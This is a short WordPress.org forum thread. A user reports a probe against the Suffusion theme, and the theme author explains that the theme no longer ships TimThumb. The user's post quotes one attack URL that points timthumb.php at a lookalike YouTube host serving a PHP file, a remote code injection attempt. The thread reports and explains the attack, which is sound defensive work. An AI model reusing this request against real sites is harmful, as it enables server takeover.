WordPress.org

Ready to get started?Download WordPress

Forums

Suffusion
Security Issue : timthumb.php (2 posts)

  1. ltoinel
    Member
    Posted 1 year ago #

    Hi, I don't use Wordress, however I received some attack in destination of the suffusion theme :

    http://xxxxxxxx/wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php

    The attacker seems to use a fake host to inject malicious php code.

    Cheers !

  2. Sayontan Sinha
    Member
    Theme Author

    Posted 1 year ago #

    Suffusion doesn't have TimThumb. You can verify the source code from the official WP repository: http://themes.svn.wordpress.org/suffusion/4.4.4/. The last version of Suffusion to have TimThumb was 3.7.1, which was almost 2 years back. In fact I took TimThumb out of Suffusion 6 months before the TimThumb vulnerability was discovered.

    Attackers try thousands of random strings in the hopes of injecting malicious code, but rest assured that TimThumb is not a part of the Suffusion code. Moreover, every theme distributed through http://wordpress.org/extend/themes/ goes through a review, and TimThumb is not allowed in your code. So there is no theme on this site that has TimThumb in it.

Topic Closed

This topic has been closed to new replies.

About this Theme

About this Topic

Tags

No tags yet.